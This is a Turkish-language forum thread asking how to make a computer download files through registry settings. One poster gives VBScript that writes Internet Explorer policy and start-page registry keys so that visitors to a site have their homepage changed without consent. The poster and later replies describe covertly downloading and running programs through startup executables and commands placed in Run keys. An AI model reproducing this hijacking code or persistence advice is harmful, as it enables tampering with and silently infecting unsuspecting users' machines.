Regeditle Download
-
s.a hocalar soru şu: regeditle download yapılabilirmi. yani regedite yazdıracağımız bi komutla download yaptırabilirmiyiz mesaj yazma hakım doldu :D evet dil lazım o da cmd olucak. cmd de bu özellik var
-
öle bişeyi ilk defa duydum. :|
regedit, sistem kayitlarinin tutuldugu bişey nasıl olucak ki? -
şöyle bi örnek veriyim. tüm tarayıcılarda çalışıyor galiba açık. Set shell = CreateObject("WScript.Shell") shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD" shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD" shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "url buraya olucak","REG_SZ" shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "url buraya olucak","REG_SZ" self.Close bak bu kodun daha devamı var. bununla siteye girenlerin homepage anında değişiyor. ve olay şu REGEDİTTE SHELL COMMAND DİYE BİYER VAR. BURADA TEMP TARZI BİŞEY GEÇİCİ OLARAK RESET ATILANA KADAR ÇALIŞACAK UYGULAMA GİRİLİYOR. ANCAK BU CMD DEN YAPILIYOR. YANİ BANA CMDDEN DOWNLOAD ETMEDE LAZIM OLABİLİR.
-
x3uqm4 bunu yazdı:
-----------------------------
öle bişeyi ilk defa duydum. :|
regedit, sistem kayitlarinin tutuldugu bişey nasıl olucak ki?
-----------------------------
:| aynen .. -
sadece internet explorerde calisiyor gosterdigin kod.
self.close ne? Javascript kodu degil mi o?
baslangicta bir exe dosyasinin acilmasini sagla, o gizlice indirsin?
Tam olarak istedigini soylersen daha iyi yardimci olurum. -
direk regeditle bişi yapamazsın sonuçta sadece anahtar ve deger tutma işlevinde olan bişi
mutlaka arkasında komut verdircek bir dil lazım
die düşünüyorum
-
cmd den parametreyle download yapılabiliyosa run lara parametreli bi şekilde yazdırırsan download edebilirsin
-
veritabanı desteği olmadan işe yaramaz.